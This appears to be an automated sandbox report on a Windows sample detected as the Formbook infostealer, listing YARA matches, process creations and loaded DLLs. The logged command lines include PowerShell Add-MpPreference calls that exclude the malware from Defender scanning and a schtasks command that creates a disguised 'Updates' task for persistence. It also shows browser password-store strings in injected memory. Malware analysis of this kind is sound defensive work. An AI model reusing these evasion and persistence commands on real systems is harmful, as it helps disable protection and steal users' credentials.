            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: String function: 017E5130 appears 58 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: String function: 0182F290 appears 103 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: String function: 017F7E54 appears 107 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: String function: 0181EA12 appears 86 times
            Source: C:\Windows\SysWOW64\reg.exe | Code function: String function: 035A7E54 appears 107 times
            Source: C:\Windows\SysWOW64\reg.exe | Code function: String function: 035CEA12 appears 86 times
            Source: C:\Windows\SysWOW64\reg.exe | Code function: String function: 03595130 appears 58 times
            Source: C:\Windows\SysWOW64\reg.exe | Code function: String function: 0354B970 appears 262 times
            Source: C:\Windows\SysWOW64\reg.exe | Code function: String function: 035DF290 appears 103 times
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1696965309.00000000009FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1717063063.00000000050D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1722685780.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697199208.0000000000C30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697745017.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.00000000012AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamereg.exej% vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamereg.exej% vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.000000000189D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe | Binary or memory string: OriginalFilenameZxNe.exeL vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: jlsvOH1c8bSRKqM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AZJifQrhDpEQCA.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: _0020.SetAccessControl
Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: _0020.AddAccessRule
Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, webBCGxs4cEidVqfoA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: _0020.SetAccessControl
Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: _0020.AddAccessRule
Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, webBCGxs4cEidVqfoA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: _0020.SetAccessControl
Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, ekiVxK6VuR4OQnevN0.cs Security API names: _0020.AddAccessRule
Source: 0.2.jlsvOH1c8bSRKqM.exe.c30000.0.raw.unpack, webBCGxs4cEidVqfoA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.AZJifQrhDpEQCA.exe.285ef1c.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.jlsvOH1c8bSRKqM.exe.5150000.5.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 9.2.AZJifQrhDpEQCA.exe.2866f34.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/16@15/8
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe File created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe File created: C:\Users\user\AppData\Local\Temp\tmpB59F.tmp
Source: jlsvOH1c8bSRKqM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jlsvOH1c8bSRKqM.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: reg.exe, 00000011.00000003.2044962456.0000000003106000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4128479477.0000000003106000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: jlsvOH1c8bSRKqM.exe ReversingLabs: Detection: 34%
Source: jlsvOH1c8bSRKqM.exe Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe File read: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
Source: unknown Process created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Process created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
